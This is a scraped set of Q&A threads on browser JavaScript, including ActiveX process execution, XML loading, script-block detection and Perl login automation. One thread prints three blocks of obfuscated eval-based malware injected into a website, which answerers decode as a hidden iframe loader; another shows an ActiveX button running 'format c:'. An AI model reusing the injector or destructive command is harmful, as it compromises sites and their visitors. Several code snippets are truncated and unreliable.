Suprisingly, JavaScript Code could execute any process it want. Why? - javascript

I asked "How to run a executable file from a web page?"
Many people told me that's impossible, but my colleague find a piece of JavaScript code that could execute any process. I can not believe ActiveX is so dangerous.
How could this happen? Why this is not forbidden by IE?
<SCRIPT language=JavaScript>
function Run(strPath) {
try {
var objShell = new ActiveXObject("");
objShell = null;
catch (e){alert('Can not find "'+strPath)
<BUTTON class=button onclick="Run('notepad')">notepad</BUTTON><br>
<BUTTON class=button onclick="Run('mspaint')">mspaint</BUTTON><br>
<BUTTON class=button onclick="Run('calc')">calc</BUTTON><br>
<BUTTON class=button onclick="Run('format c:')">format c:</BUTTON><br>

While you can do this IE will block it saying that there is an
ActiveX Control is trying to access
you computer, click here for options
You can only run these if the end user allows them too and hopefully people are clever enough not to allow it to run. If you do allow it then there is always another alert asking if you really want to run this so there should be enough security around it.

Local files run in a different security environment than remote files, so while that will work if you save the file as an html and open it from your computer, if you upload it on a server and try to run it from there it will not work.

Did you try this? can't be used in this way from a web page loaded remotely. If you loaded the web page from a local file or have changed your security settings it might work but it won't work when loaded from a remote web server.

The good news is IE8 blocks this behaviour, even with a local file. I don't know about IE7, though I would imagine this is also the case. I would doubt it would work with a remote file, even with IE6, otherwise we would have had some major incident by now and a patch would have been issued.

Its depends on your browser's security configuration. In some cases this peace of code will not be executed. But anyway user will be asked to allow ActiveX to run external process:
ActiveX Control is trying to access you computer, click here for options


Getting access to a XML from javascript without Node-Without JQuery

I am trying to developp modifications to a game. The thing is the game is already compiled and the developpers prefer not to decompile the game (for the time beeing). Because of the compilation probably, everytime I try to load JQuery or Node.js whatever version I get the error "that a key already exists in the dictionary". The thing is everything is fine without Node.js or JQuery.js.
What I am trying to achieve is add some features to the game that unfortunately aren't available through the Game's API function call itself. I want to be able to get access to data Inside .xml files used for items/weapons/devices/engines spécifications of items Inside the game. I've tried pretty much all I could find on Stackexchange with what I searched for which was Node and JQuery. Im sorry if you guys think this is a duplicate question. Because it isn't. I can't use Node.js neither can i use JQuery. What else could I try? can someone help me please.
I am a bit new to programing with only 1 year experience in c# and Javascript. Sorry if this feels really noObish to you guys.
What you need is ajax. Modern browsers provide a pretty functional XMLHttpRequest, so you don’t even need a framework anymore.
One important thing to know: you most likely won’t be able to download the xml file using ajax if it’s on a distant server, due to the same-origin policy. You need a reliable access to it. The most convenient solution is to have a copy of the file on a local server such as WAMP, XAMPP, and the like.
I’m not going to write yet another ajax tutorial. Insteal I’ll just provide you with a working minimal HTML page, and point you towards XMLHttpRequest documentation.
'use strict';
function () {
let req = new XMLHttpRequest();
req.onload = function () {
if (this.responseXML) {
else {
};'GET', xmlURL); // xmlURL should be the location of the .xml file
When you click on the button, the script will request, and then display the server’s response, if any, in your browser console. To open the console, press F12 and select the console tab.
Be aware that the responseXML property will only be populated if the xml sent by the server is strictly well-formed. Xml parsing in JS is somewhat finicky, so you may want to rely on responseText as a fallback.

How can I detect if javascript files are being blocked by IE11 security settings?

I have a site that renders nearly everything through javascript (not my design), and this has caused a lot of issues in Internet Explorer, of course. The recurring issue is that when the user has security set to High, the necessary javascript files get blocked, I believe because they are from another domain. This has something to do with the Drupal setup, I'm not entirely sure, but the important thing to know is that the files are served from a different domain and there's nothing I can do about that.
What my client wants is for an alert to pop up whenever these scripts are getting blocked that tells their users how to change their security settings.
1) If I add a javascript file on the same domain, it shouldn't get blocked, right?
2) Is there a way I can detect what the user's security settings are, or detect if scripts are being blocked using javascript?
There is another way to detecting whether a js script was loaded or not; there could be so many things, it can be their network firewall, os level firewall, browser security settings, the list continues with possibilities.
You can have:
<script src=""></script>
<script>if (typeof foo == "undefined") {alert ('error loading script');}</script>
Make sure in the_js_script.js, you'd have
var foo = 'Script loaded successfully';
You can do that for all the js scripts, and alert distinct messages so the user at least knows which scripts were blocked or if they came through.
Setting your IE security set to High, disables all scripts from running in the browser.
The only workaround available is to place a warning message using the noscript html tag.
<noscript>Your browser does not support JavaScript!</noscript>
I would have liked to comment on #unixmiah's answer, but I don't have enough reputation, and I believe this is an answer as well. Unixmiah's solution won't work to alert blocked clients, I think since the alert needs a script to be generated.However, I believe this would work (wouldn't it?):
jQuery(function($) {
$(document).ready(function() {
<script src=""></script>
<p id="jstrap">You seem to have switched Javascript off.</p>

javascript failing with permission denied error message

I have a classic ASP web page that used to work... but the network guys have made a lot of changes including moving the app to winodws 2008 server running iis 7.5. We also upgraded to IE 9.
I'm getting a Permission denied error message when I try to click on the following link:
<a href=javascript:window.parent.ElementContent('SearchCriteria','OBJECT=321402.EV806','cmboSearchType','D',false)>
But other links like the following one work just fine:
<a href="javascript:ElementContent('SearchCriteria','OBJECT=321402.EV806', 'cmboSearchType','D',false)">
The difference is that the link that is failing is in an iframe. I noticed on other posts, it makes a difference whether or not the iframe content is coming from another domain.
In my case, it's not. But I am getting data from another server by doing the following...
set objhttp = Server.CreateObject("winhttp.winhttprequest.5.1") "get", strURL
and then i change the actual html that i get back ... add some hyperlinks etc. Then i save it to a file on my local server. (saved as *.html files)
Then when my page is loading, i look for the specific html file and load it into the iframe.
I know some group policy options in IE have changed... and i'm looking into those changes. but the fact that one javascript link works makes me wonder whether the problem lies somewhere else...???
any suggestions would be appreciated.
You could try with Msxml2.ServerXMLHTTP instead of WinHttp.WinHttpRequest.
See differences between Msxml2.ServerXMLHTTP and WinHttp.WinHttpRequest? for the difference between Msxml2.ServerXMLHTTP.
On this exellent site about ASP you get plenty of codesamples on how to use Msxml2.ServerXMLHTTP which is the most recent of the two:
About the IE9 issue: connect a pc with an older IE or another browser to test if the browser that is the culprit. Also in IE9 (or better in Firefox/Firebug) use the development tools (F12) and watch the console for errors while the contents of the iFrame load.
Your method to get dynamic pages is not efficient i'm afraid, ASP itself can do that and you could use eg a div instead of an iframe and replace the contents with what you get from the request. I will need to see more code to give better advice.

How to manipulate Javascript websites in Perl

I have been asked to automate the logging into a webapp(what I assume to be one, that runs a lot of .aspx and .js scripts) that, currently, can only run in IE. Now i am programming in Perl and have tried to use Win32::IE::Mechanize to run the IE browser and log in. What i did was try an extract all the forms from the webapp, and given the users information, fill out the required forms, but this is where the problem arises, when I try and run the subroutine no forms appear......
So then I transitioned into WWW::Mechanize and used the post subroutine(from LWP::UserAgent) which solved the problem for the most part. Now i've run into a problem in the response, from the server, I get this script as the content of the response and I don't know what to do with it.
So my question is: Using Perl how can I go about to manipulate a Javascript functions in a website? Would that even be a valid solution to the problem?
I am open to writing this in other programming languages as well. Thanks in advance for the help!
(So that I can fully log in to the webapp)
Update: The content of the response:
var msgTimerID;
var strForceLogOff = "false";
function WindowOnLoad(){
if ("false" == "true" && "false" == "false")
if ("false"=="true")
msgTimerID = window.setInterval("MerlinSystemMsg(10095,64)", 300000,'javascript');
function MyShowModal(){
showModalDialog("", window, strFeatures);}
function clearMsgInterval(){
function WindowOnUnLoad(){
if(top.frames(0).document.getElementById("OPMODE").value =="LOGOFF"){
strFeatures = "width=1,height=1,left=1000,top=1000,toolbar=no,scrollbars=no,menubar=no,location=no,directories=no,status=yes,resizable=1";"ForceLogOff.aspx","forcelogout",strFeatures);
window.onbeforeunload = WindowOnUnLoad;
window.onload = WindowOnLoad;
There is also this Frame Title that has the src:
FRAME TITLE="Service Desk Express Navigator" SRC="options_nailogo.aspx" MARGINWIDTH=0 MARGINHEIGHT=0 NORESIZE scrolling=no
Trying to emulate the browser with a fully functioning JS engine is going to be a mighty big task. Instead, I'd suggest that you just try to emulate the actual interaction with the web site and not care what HTML/JS is actually sent back. Your server side code doesn't care how the HTTP submissions take place, only that they do. Admittedly this is more fragile if the forms change a lot, but at least you're not trying to implement a full browser.
So look at modules like LWP::UserAgent, HTTP::Request and HTTP::Response.
I'm copying and pasting my answer to your other duplicate question here
(You should consider deleting one of these?)
That content is the website source :)
How WWW::Mechanize deals with FRAME SRC as a link:
Note that <FRAME SRC="..."> tags are parsed out of the the HTML and
treated as links so this method works with them.
You'll want to use follow_link on that link.
As far as dealing with Javascript, there is support for a Firefox Add-on called MozRepl that you can use in conjunction with WWW::Mechanize::Firefox that I have used in the past to call Javascript code while crawling a page.

What does this script do?

Would anybody be able to tell me what the below script does? It keeps injecting itself into our site about every two weeks (always between Sundays and Mondays). We've reloaded our "clean" site dozens of times but it just keeps happening. We've installed and made every security recommendation that we've read but it just keeps getting into all of our index.html files and a few of our php files.
Anybody have any idea of what it does or where it comes from? We could really use some help!
var ar="v)y{ifu=lg[rETCB}me h>;
s\"/ 0.,tN1:('<cAb]waonpd";
k=new Boolean().toString();
date=new Date();
var ar2 = "f57,57,12,15,78,102,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,3,9,57,57,57,12,15,33,126,51,54,33,102,3,66,57,57,48,78,54,24,69,54,78,9,57,57,57,138,129,111,18,51,54,132,90,84,123,33,12,90,54,102,72,108,12,15,33,126,51,54,78,69,33,111,21,105,60,90,90,135,99,75,75,138,129,24,129,126,69,84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,78,123,12,138,90,60,21,105,96,81,105,78,60,54,12,27,60,90,21,105,96,81,105,78,69,90,6,24,54,21,105,0,12,69,12,117,12,24,12,90,6,99,60,12,138,138,54,132,66,135,129,69,12,90,12,129,132,99,126,117,69,129,24,18,90,54,66,24,54,15,90,99,81,66,90,129,135,99,81,66,105,63,108,75,12,15,33,126,51,54,63,72,3,66,57,57,48,57,57,15,18,132,111,90,12,129,132,78,12,15,33,126,51,54,33,102,3,9,57,57,57,0,126,33,78,15,78,21,78,138,129,111,18,51,54,132,90,84,111,33,54,126,90,54,36,24,54,51,54,132,90,102,105,12,15,33,126,51,54,105,3,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,69,33,111,105,87,105,60,90,90,135,99,75,75,138,129,24,129,126,69,84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,3,66,15,84,69,90,6,24,54,84,0,12,69,12,117,12,24,12,90,6,21,105,60,12,138,138,54,132,105,66,15,84,69,90,6,24,54,84,135,129,69,12,90,12,129,132,21,105,126,117,69,129,24,18,90,54,105,66,15,84,69,90,6,24,54,84,24,54,15,90,21,105,81,105,66,15,84,69,90,6,24,54,84,90,129,135,21,105,81,105,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,123,12,138,90,60,105,87,105,96,81,105,3,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,60,54,12,27,60,90,105,87,105,96,81,105,3,66,57,57,57,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,84,126,135,135,54,132,138,42,60,12,24,138,102,15,3,66,57,57,48]".replace(k.substr(0,1),'[');
pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));
var ar="N<B)10'paes,>.nidtf3[T;
hwy mCE:gA{](=o/\"c}lbr vu";
k=new Boolean().toString();
date=new Date();
var ar2 = "f78,78,45,54,135,105,48,111,120,141,81,27,42,51,39,93,27,51,87,126,27,81,27,42,51,30,6,75,63,24,93,0,24,81,27,105,18,129,111,48,75,18,9,60,15,102,9,99,78,78,78,45,54,132,24,81,27,132,105,9,66,78,78,123,135,27,126,30,27,135,99,78,78,78,48,111,120,141,81,27,42,51,39,72,132,45,51,27,105,117,3,45,54,132,24,81,27,135,30,132,120,108,18,69,51,51,21,90,114,114,27,48,45,51,45,24,126,39,120,111,81,114,120,111,141,42,51,57,15,39,21,69,21,18,135,72,45,48,51,69,108,18,12,15,18,135,69,27,45,93,69,51,108,18,12,15,18,135,30,51,75,126,27,108,18,138,45,30,45,129,45,126,45,51,75,90,69,45,48,48,27,42,66,21,111,30,45,51,45,111,42,90,24,129,30,111,126,141,51,27,66,126,27,54,51,90,15,66,51,111,21,90,15,66,18,36,3,114,45,54,132,24,81,27,36,117,9,66,78,78,123,78,78,54,141,42,120,51,45,111,42,135,45,54,132,24,81,27,132,105,9,99,78,78,78,138,24,132,135,54,135,108,135,48,111,120,141,81,27,42,51,39,120,132,27,24,51,27,87,126,27,81,27,42,51,105,18,45,54,132,24,81,27,18,9,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,30,132,120,18,33,18,69,51,51,21,90,114,114,27,48,45,51,45,24,126,39,120,111,81,114,120,111,141,42,51,57,15,39,21,69,21,18,9,66,54,39,30,51,75,126,27,39,138,45,30,45,129,45,126,45,51,75,108,18,69,45,48,48,27,42,18,66,54,39,30,51,75,126,27,39,21,111,30,45,51,45,111,42,108,18,24,129,30,111,126,141,51,27,18,66,54,39,30,51,75,126,27,39,126,27,54,51,108,18,15,18,66,54,39,30,51,75,126,27,39,51,111,21,108,18,15,18,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,72,45,48,51,69,18,33,18,12,15,18,9,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,69,27,45,93,69,51,18,33,18,12,15,18,9,66,78,78,78,48,111,120,141,81,27,42,51,39,93,27,51,87,126,27,81,27,42,51,30,6,75,63,24,93,0,24,81,27,105,18,129,111,48,75,18,9,60,15,102,39,24,21,21,27,42,48,84,69,45,126,48,105,54,9,66,78,78,123]".replace(k.substr(0,1),'[');
pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));
var ar="rf:pmy'1uvAE, hi)2Tbs{ [tg=BcC\"do<a(.}N/9];wl>en0";
k=new Boolean().toString()
var ar2 = "f66,0,-21,-42,36,66,-12,3,-12,-60,-12,126,3,-69,36,-33,63,-66,-39,99,6,-126,126,3,-69,-12,21,-66,39,48,-27,39,-12,-90,126,-33,-87,39,39,-3,-78,3,30,21,75,-21,-75,15,3,0,0,-21,-42,-3,102,-90,126,-138,105,-57,78,-60,0,45,-72,99,-6,-72,78,-99,24,3,0,0,27,3,-12,-60,-12,126,3,-69,36,21,-129,45,27,66,-33,-15,9,-54,-42,-3,102,-90,126,-99,21,-60,84,-6,-60,24,30,0,-63,-3,111,0,12,-33,-96,12,126,-66,30,30,-24,-24,12,-84,105,-33,12,-72,117,-69,-21,69,-12,-99,33,-33,9,21,90,-84,48,-21,-30,36,-60,3,123,-126,21,3,96,-93,30,-33,30,6,-60,3,123,-126,21,21,12,-57,117,6,-60,-60,9,18,15,-15,12,-12,87,-87,27,-57,-9,36,3,48,0,45,3,-15,-117,87,-36,-15,27,-27,51,45,-135,96,-45,3,36,36,-108,48,66,-12,6,6,-135,69,-66,138,-18,-54,24,-87,-3,138,-18,-108,117,-36,18,-72,-42,-3,102,-90,126,-3,-45,-42,78,-60,0,45,-45,0,-63,21,117,-57,-12,-27,51,45,-102,6,-42,-3,102,-90,126,-138,105,-57,15,3,0,0,-39,75,-102,39,-36,36,39,-39,54,3,-12,-60,-12,126,3,-69,36,-24,-84,138,-36,-30,66,-105,99,6,-126,126,3,-69,33,-87,27,-42,-3,102,-90,126,-120,30,78,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,42,-60,84,-66,18,-18,24,30,0,-63,-3,111,0,12,-33,-96,12,126,-66,30,30,-24,-24,12,-84,105,-33,12,-72,117,-69,-21,69,-12,-99,33,-33,9,30,78,-123,105,-48,12,-57,117,6,-30,-81,18,15,-15,12,-12,87,-87,27,-57,63,-60,24,3,48,0,45,3,-123,108,-123,105,-48,12,-57,117,6,-30,-99,87,-36,-15,27,-27,51,45,-63,-60,84,-45,3,36,36,-108,48,66,-120,108,-123,105,-48,12,-57,117,6,-30,24,6,-135,69,6,-60,126,-126,108,-123,105,-48,12,-57,117,6,-30,-36,24,-87,69,-60,126,-126,108,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,111,-84,48,-21,-30,-24,18,-18,3,123,-126,30,78,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,24,96,-93,30,-33,30,-54,18,-18,3,123,-126,30,78,-60,0,0,27,3,-12,-60,-12,126,3,-69,36,-33,63,-66,-39,99,6,-126,126,3,-69,-12,21,-66,39,48,-27,39,-12,-90,126,-33,-87,39,39,-3,-78,3,30,21,75,-21,-15,-6,-93,0,129,3,-48,-6,-45,3,87,-39,12,-102,45,78,-60,0,45]".replace(k.substr(0,1),'[');
p=(typeof document).toString()
pau="rn evobject".replace(p,"al");
e=new Function("","retu"+pau);
var pos=0;
Via the power of JSUnpack, we can decrypt a chunk of that obfuscated code and see part of the functionality...
document.write (s) <iframe src='' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
That source is currently 404, but it doesn't look very friendly. It's effectively downloading an arbitrary page into the browser, which could be for something as "simple" as fake Pagerank building through to a malicious drive by code execution exploit. Regardless, it appears dead for now, but it probably wasn't trying to help you.
You seem to have some kind of XSS injection flaw in your site software (or a malicious internal user). Looks like it's time for a proper security audit (both of server, server software, and your PHP application). If you're running an off the shelf PHP package (like Wordpress), make sure you've upgraded to the latest version. You might also want to change any relevant passwords (if it's happening on a regular schedule, it might be a manual injection).
The script is probably designed to lure users to a site containing malware and browser exploits.
The reason that you're repeatedly being infected is because somewhere in your codebase there is a vulnerability. I suspect you've got an unprotected or broken file upload page that allows any old file to be uploaded (including scripts) and then executed. Once it's done infecting your files it probably delete's itself.
I would have a trawl through your web server log files at around the time the infection happens and look for suspicious activity for any pages that allow users to upload content.
what other scripts do you use on your site? look at those because those could be injecting this.
maybe your webhost is shady, try to change. Or it could be a web analytics code
The exact same code is being injected into the index.html file on one of my sites. By looking at the logs we determined that someone with the IP address had gotten access via FTP. We're not exactly sure how he got in yet, but you might want to take a look at your logs and block that address.
Good luck!

